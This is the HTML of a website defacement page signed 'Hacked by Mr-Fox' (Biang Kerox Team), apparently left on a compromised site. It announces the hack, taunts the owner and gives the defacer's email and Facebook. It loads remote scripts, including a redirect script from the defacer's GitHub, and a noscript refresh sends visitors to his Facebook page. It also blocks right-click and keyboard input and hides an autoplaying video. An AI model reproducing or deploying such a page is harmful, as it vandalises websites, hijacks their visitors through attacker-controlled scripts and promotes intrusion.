
<meta http-equiv="content-type" content="text/html; charset=iso-8859-9"/>

<html><head>
<title>Biang Kerox Team</title>
<meta content='This Site Has Been Hacked by Mr-Fox' name='description'/>
<meta content='Hacked by Mr-Fox, Hacked, Mr-Fox' name='keywords'/>
<link REL="SHORTCUT ICON" HREF="https://cdn1.iconfinder.com/data/icons/finalflags/128/Indonesia-Flag.png">
<link href='http://fonts.googleapis.com/css?family=Pirata+One' rel='stylesheet' type='text/css'>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"
<script src="http://masterendi.googlecode.com/files/salju.js"></script>
 <script type="text/javascript">$(document).ready(function() {$(".facebookbox").hover(function() {$(this).stop().animate({right: "0"}, "medium");}, function() {$(this).stop().animate({right: "-250"}, "medium");}, 500);});
    </script><style type="text/css">
    .facebookbox{background: url("../www9.0zz0.com/2012/12/05/17/644420689.png")
     no-repeat scroll left center transparent !important;display: block;float: right;height: 270px;padding: 0 5px 0 46px;width: 245px;z-index: 99999;position:fixed;right:-250px;top:40%;}
    .facebookbox div{border:none;position:relative;display:block;}
    .facebookbox span{bottom: 12px;font: 8px "lucida grande",tahoma,verdana,arial,sans-serif;position: absolute;right: 6px;text-align: right;z-index: 99999;}
    .facebookbox span a{color: #808080;text-decoration:none;}
    .facebookbox span a:hover{text-decoration:underline;}</style><div class="facebookbox" >
<iframe scrolling="no" frameborder="0" style="border: medium none; overflow: hidden; height: 270px; width: 245px;background:#fff;" src="http://www.facebook.com/plugins/likebox.php%3Fhref=https:%252F%252Fwww.facebook.com%252FOfficial.Mr.Fox%252F&amp;width=245&amp;colorscheme=light&amp;show_faces=true&amp;connections=9&amp;stream=false&amp;header=false&amp;height=270"></iframe>
<script>
var message="Hai";
///////////////////////////////////
function clickIE4(){if (event.button==2){alert(message);return false;}}
function clickNS4(e){if (document.layers||document.getElementById&&!document.all){if (e.which==2||e.which==3){alert(message);return false;}}}
if (document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS4;}
else if (document.all&&!document.getElementById){document.onmousedown=clickIE4;}
document.oncontextmenu=new Function("alert(message);return false")</script>
<body font style="color:black;font size:9px;text-align: center;font-family:Pirata One;text-shadow: 3px 3px 3px green;" background="http://www.pageresource.com/wallpapers/wallpaper/final-fantasy-digital-collection-game_1184318.jpg" fixed; oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;"> 
<br>
<br><br>
<center> 
<style>
.gambargetar{
position:relative
}
.mbut{opacity:0.5;-webkit-transition:all 250ms ease;-moz-transition:all 250ms ease;-o-transition:all 250ms ease;transition:all 250ms ease;}img:hover{opacity:1;}textarea{resize:none;}
</style>
<script type="text/javascript" src="https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/wwwkikiyococc/gambargetar.www.kikiyo.co.cc.js"></script>
<script src='https://raw.githubusercontent.com/Haikalis666/javascript/gh-pages/haikalredirect.js' type='text/javacript'></script>
</div> 
<br>
<noscript>
<meta http-equiv="refresh" content="0;URL='http://www.facebook.com/www.haikal.go.id/'">
</noscript>
<br>
<br>
<br>
<br>
<img src="http://zonehmirrors.org/defaced/2015/12/30/asapdashboard.com/asapdashboard.com/fox/../../kreditbaru.com/docs/wasu.png"/>
<font face="courier new"><font color="yellow" size="4">

<font color="black">
<center><font style="color:black;font size:9px;text-align: center;font-family:Pirata One;text-shadow: 3px 3px 3px red;"><font size="5" font-family="Pirata One" color="red">Low Security</font></p><center>
<font face="Courier New" color="white" size="4px">Hacked by Mr-Fox</font><br/>
<font face="Courier New" color="white" size="3px">Contact me at : haikal.is.666@gmail.com</font>
<br>
<font face="Courier New" color="red" size="3px">Patch Your Website Dumbfuck</font>
<br>
<embed src="http://www.youtube.com/v/BfbcYoRWyvA&amp;autoplay=1&amp;loop=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1">
